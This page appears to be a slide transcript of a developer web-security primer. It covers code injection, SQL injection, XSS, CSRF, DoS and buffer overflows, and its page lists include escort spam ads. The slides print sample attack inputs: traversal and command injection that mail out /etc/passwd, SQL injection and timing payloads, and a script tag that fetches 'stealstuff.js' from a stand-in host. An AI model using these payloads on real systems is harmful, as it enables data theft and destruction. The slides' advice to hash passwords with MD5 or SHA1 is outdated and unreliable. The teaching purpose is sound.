Unique Features of SQL Injection in PHP AssignmentUnique Features of SQL Injection in PHP Assignment
Unique Features of SQL Injection in PHP Assignment
 

Último

Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Igalia
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Allon Mureinik
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 3652toLead Limited
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 

Último (20)

Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 

Web Security 101 for Developers

  • 1. Web Security 101 Michael Peters Plus Three, LP
  • 2. Web Security 101 (for developers) Michael Peters Plus Three, LP
  • 3. You Do Not Control The Client ●All Input is EVIL! ● URLs ● GET/POST parameters ● Cookies ● HTTP Headers ●Client-side security can be by-passed ● Although there are cases where it's important (like DOM Based XSS attacks) ●Be strict on validation. White list, don't black list. ●There are no easy solutions. Security needs to be everywhere.
  • 4. Know Your Tools ●Each language is different and has different strengths and weaknesses ● yes, some languages are weaker than others How abstract are your tools? ● ● Code generation or compilation? ● Do you trust the security track record of your vendor?
  • 5. Kinds of Attacks Code Injection ● ● system commands ● SQL ● HTML ● Javascript ●Cross Site Scripting (XSS) ●Cross Site Request Forgery (CSRF) ●Denial of Service (DOS) ●Buffer Overflows
  • 6. Code Injection System Commands Creating filenames based on user input my $user_id = $q->param('user_id'); my $pic = "/some/path/pictures/$user_id.jpg"; open(PIC, ">$pic"); print ...
  • 7. Code Injection System Commands Creating filenames based on user input my $user_id = $q->param('user_id'); my $pic = "/some/path/pictures/$user_id.jpg"; open(PIC, ">$pic"); print ... ?user_id=..%2F..%2F..%2Fetc%2Fpasswd
  • 8. Code Injection System Commands Creating filenames based on user input my $user_id = $q->param('user_id'); my $pic = "/some/path/pictures/$user_id.jpg"; open(PIC, ">$pic"); print ... ?user_id=../../../etc/passwd
  • 9. Code Injection System Commands Using user input in system commands In Perl, system commands are executed using system(), exec(), ``, qx() and sometimes even with open() In PHP, system commands are executed using system(), exec(), ``, passthru(), popen(), pcntl_exec() $user_id = $_POST{'user_id'}; $pic = "/some/path/pictures/$user_id.jpg"; if (`ls $pic`) { ... }
  • 10. Code Injection System Commands Using user input in system commands In Perl, system commands are executed using system(), exec(), ``, qx() and sometimes even with open() In PHP, system commands are executed using system(), exec(), ``, passthru(), popen(), pcntl_exec() $user_id = $_POST{'user_id'}; $pic = "/some/path/pictures/$user_id.jpg"; if (`ls $pic`) { ... } ?user_id=;sendmail mpeters@plusthree.com < /etc/passwd
  • 11. Code Injection System Commands Filenames: Strip out any “upwards” paths, and make sure that files are relative to a safe “root” (not the filesystem root or even your document root). my $path = $q->param('path'); $path = File::Spec->no_upwards($path); my $pic = "/some/path/pictures/$path.jpg";
  • 12. Code Injection System Commands Anything else: Be strict on validating what you're passing. ●If it's a numeric flag, make sure it's numeric. ●If it's string, make sure it's a valid option, validate length, etc.
  • 13. Code Injection System Commands Bonus: Perl's taint mode ●Using -T or PerlTaintCheck On in mod_perl ●Automatically prevents any outside data making it's way into a system command without being specifically untainted by the developer ●Not a magic bullet, but a very good safety net.
  • 14. SQL Injection Assembling Queries Similar to Code Injection attacks, this attack relies on the developer using some user input as part of an SQL query. my $search = $q->param('search'); my $sql = "SELECT * FROM clients WHERE name = '$search'";
  • 15. SQL Injection Assembling Queries Similar to Code Injection attacks, this attack relies on the developer using some user input as part of an SQL query. my $search = $q->param('search'); my $sql = "SELECT * FROM clients WHERE name = '$search'"; Can be used to delete data ?search=';DROP ALL TABLES
  • 16. SQL Injection Assembling Queries Similar to Code Injection attacks, this attack relies on the developer using some user input as part of an SQL query. my $search = $q->param('search'); my $sql = "SELECT * FROM clients WHERE name = '$search'"; Can be used to corrupt data ?search=';UPDATE clients SET name=blah
  • 17. SQL Injection Assembling Queries Similar to Code Injection attacks, this attack relies on the developer using some user input as part of an SQL query. my $search = $q->param('search'); my $sql = "SELECT * FROM clients WHERE public = 1 AND name = '$search'"; Can be used to steal data ?search=foo' OR public = 0
  • 18. SQL Injection Assembling Queries SQL Injection attacks can even be used in places where the data results aren't shown to the user. my $user = $q->param('username'); my $sql = "SELECT password FROM users WHERE username = '$user'"; Using a "timing" attack we can see how long the queries take to return ?user=' UNION SELECT IF(username LIKE 'a%',SLEEP(3),null) FROM user WHERE user_id=1 In about 30 tries an attacker could get the a user's password
  • 19. SQL Injection Assembling Queries Don't try and escape user input ●See PHP's magic_quotes() vs addslashes() vs mysql_escape_string() vs mysql_real_escape_string() ●It's error prone, it's hard to get right. Always use "bind" variables in your DB library my $user = $q->param('username'); my $sql = "SELECT password FROM users WHERE username = ?"; my $sth = $dbh->prepare($sql); $sth->execute($user);
  • 20. SQL Injection Assembling Queries Sometimes you can't always use bind variables. In these rare cases, be extremely strict in your validation. $limit = $q->param('limit'); $limit = 10 unless $limit =~ /^d+$/ || $limit > 50; my $sql = "SELECT * FROM users WHERE first_name = ? LIMIT $limit"; my $sth = $dbh->prepare($sql);
  • 21. SQL Injection ORMs, Libraries, etc Just because you are using an ORM or other library to assemble your SQL doesn't mean you can turn off your brain: use SQL::Abstract; my $sql = SQL::Abstract->new(); $sql->where({ public => 1, name => $q->param('search'), });
  • 22. SQL Injection ORMs, Libraries, etc Just because you are using an ORM or other library to assemble your SQL doesn't make you immune: use SQL::Abstract; my $sql = SQL::Abstract->new(); $sql->where({ public => 1, name => $q->param('search'), }); ?search=blah&search=public&search=0
  • 23. SQL Injection ORMs, Libraries, etc Just because you are using an ORM or other library to assemble your SQL doesn't make you immune: use SQL::Abstract; my $sql = SQL::Abstract->new(); $sql->where({ public => 1, name => scalar $q->param('search'), }); ?search=blah&search=public&search=0
  • 24. XSS Cross Site Scripting Injecting Javascript (or other scripts) that will run on behalf of another user. This code usually steals cookies (authenticated credentials) of the person who "sees" the infected web page. <script source="http://badguys.com/stealstuff.js"> </script> Exploits a user's trust of a site. Can be combined with phishing or CSRF to steal all kinds of things.
  • 25. XSS Cross Site Scripting Any site that takes input from user is subject to XSS. Even if that input isn't shown on any public facing site. ●Comments ●Petition form that shows a list of signatures ●Contact form where the data is stored and shown in an Admin screen. ●Putting data from URL into the HTML
  • 26. XSS Non-Persistant User finds a way to embed their malicious content temporarily in another web site. Usually as part of a URL. ●Alice sends a specially crafted search engine link to a mailing list. ●Bob posts a malicious link on a company's help forum that a help desk employee clicks on. ●Easy to combine with phishing or social engineering
  • 27. XSS Persistant User submits mailicious code that then becomes permanently attached to a site. Usually some sort of <script> tag. ●Alice updates her profile on a site with a malicious "description". When her profile is seen by another user it can steal that user's auth credentials. ●Alice's profile information is seen by an admin of the site in some admin interface. This now give's Alice admin credentials. The MySpace worm ●
  • 28. XSS DOM Based Similar to Non-Persistant XSS, this attack relies on a site having client-side scripting that manipulates the DOM. Unlike the Non- Persistant variety, this attacks client-side security. ●Bob creates a malicious URL for a site that uses JS to insert content into the DOM thus exposing anyone who clicks on that link to credential theft ●Alice's profile information is returned via JSON and inserted into the DOM by a site's JS and exposes users and admins to credential theft.
  • 29. XSS Common misbelief that user input should be escaped before storing. ●False sense of security because you don't know how this information will be used. ●This causes problems when you want to use this data in a non-HTML context (spreadsheets, pdfs, etc)
  • 30. XSS Non-HTML User Input User input should be validated when received and escaped when used in output. ●Each field is different and should be carefully validated. Validate the type, the format and the length. ●Output needs to be escaped based on how it's used. HTML, URL, Javascript or CSS escaping.
  • 31. XSS Non-HTML User Input Perl's HTML::Template as an example <td><tmpl_var first_name escape=html></td> var name = '<tmpl_var first_name escape=js>' <a href="search?first_name= <tmpl_var first_name escape=url>">Search</a> Doesn't currently support CSS escaping (which is tricky to get right, so please avoid putting user content into CSS).
  • 32. XSS Non-HTML User Input Perl's Template Toolkit as an example <td>[% first_name | html %]</td> <a href="search?first_name= [% first_name | uri %]">Search</a> Doesn't currently support JS escaping ● ● escaping the following characters with a backslash ' " r n ●Doesn't currently support CSS escaping (which is tricky to get right, so please avoid putting user content into CSS).
  • 33. XSS HTML User Input Avoid accepting HTML input from users whenever possible. But sometimes it's unavoidable. ●Filter the HTML to an acceptable subset ●Whitelist, don't blacklist ● Which elements do you need to support? ● Never accept <script> or <style> elements ● Which attributes do you need to support? ● Never accept on* events, style, javascript: in URLs (src, href, etc) ●Even with a good HTML filter/parser it's still really hard to get right (see MySpace worm).
  • 34. CSRF Cross Site Request Forgery A malicious site executes some resource on another trusted site that you already have a relationship with. This code is executed in the context (cookies, current authentication, etc) of that trusted site but the user is unaware of the action taken. Exploits a site's trust in it's users. Can also be combined with XSS to eliminate the need for a malicious site. One trusted site is used to attack another trusted site.
  • 35. CSRF Cross Site Request Forgery Examples: ●By visiting a malicious author's site, his book is added to your Amazon.com shopping cart. ●Visiting a malicious site causes you to send out spam email from your web email service (like gmail, hotmail, etc)
  • 36. CSRF Cross Site Request Forgery Block important actions (add, delete, update, email, buy, etc) that come from any referrer (HTTP Referer header) that isn't you. Caveats: ●Some earlier versions of flash could be tricked into spoofing HTTP headers (require a newer version) ●IE6 has bugs that prevent the Referer header from being sent all the time (these are rare and strange, and can be worked around).
  • 37. CSRF Cross Site Request Forgery But can't HTTP headers be faked? Yes, but CSRF requires that the Person using the browser not know that the malicious code is running on their behalf. Users aren't going to fake their own HTTP headers when trying to attack themselves.
  • 38. CSRF Cross Site Request Forgery Another solution if you can't block by referrer is to use per-user unique tokens on every request that expire periodically. They are added as hidden fields to forms, or extra parameters on URLs. Caveats: ●Really big application change ●Usability is hurt if they expire too quickly. ●Security is hurt if they live too long
  • 39. DOS Denial of Service Lots of useless requests that overwhelm your system and halt services from legitimate customers. ●Lots of individual requests ●Massing amounts of data in POST requests ●Requests for seldom used, resource intensive URLs
  • 40. DOS Denial of Service Can usually be defended against by identifying IP addresses and blacklisting. ●Can block at the network level (firewall, router, switch) ●Apache can use mod_security or mod_dosevasive, or both
  • 41. DDOS Distributed Denial of Service Same as DOS but not coming from a single (or small group) of IP addresses. Lots of machines in lots of different locations. ●Usually involves Botnets or Malware ●You've pissed off the wrong people ●Really hard to defend against. ●Really hard to distinguish from a large spike in legitimate traffic. ●You need some serious hardware and some help from your ISP.
  • 42. Buffer Overflows Attackers craft malicious requests that cause incoming data to spill out of the bucket the programmer intended it to go. This can let the attacker overwrite existing data and code to be whatever they want. Only a problem when using low level system languages like C or C++. Programmers that use interpreted or VM languages have to trust their implementations to avoid them.
  • 43. Buffer Overflows Don't write web systems in C (or C++). Sometimes you need to use C for some fast data processing (graphics, xml parsing, etc). Be cautious, use lint tools and try and use a popular open source alternative if you can. If you screw this up it, the consequences can be scary.
  • 44. Misc Tips Never, ever, ever, ever create your own encryption algorithms. There are too many good, open and verified encryption libraries out there to be stupid enough to try it by yourself. Encryption is hard and I can guarantee you that you aren't smart enough to get it right.
  • 45. Misc Tips Never, ever, ever, ever store passwords in plain text. Don't even encrypt them. Use a 1-way encoding/ hash like crypt(), MD5 or SHA1. Don't just encode, but use a one time salt/secret to make the hash even more secure. Otherwise you're vulnerable to "rainbow tables".
  • 46. Misc Tips Never, ever, ever, ever store passwords in plain text. Don't even encrypt them. Use a 1-way encoding/ hash like crypt(), MD5 or SHA1. Don't just encode, but use a one time salt/secret to make the hash even more secure. Otherwise you're vulnerable to "rainbow tables".
  • 47. Misc Tips Avoid leaking information through your error messages. We've all seen those web pages that show you an error message about some internal problem the server is having. The standard PHP "Can't connect to MySQL" error is everywhere. Use a custom, generic error document that's served when this happens. Not only is it more professional (looks like the rest of your site) but it also prevents attackers from gaining knowledge about your system.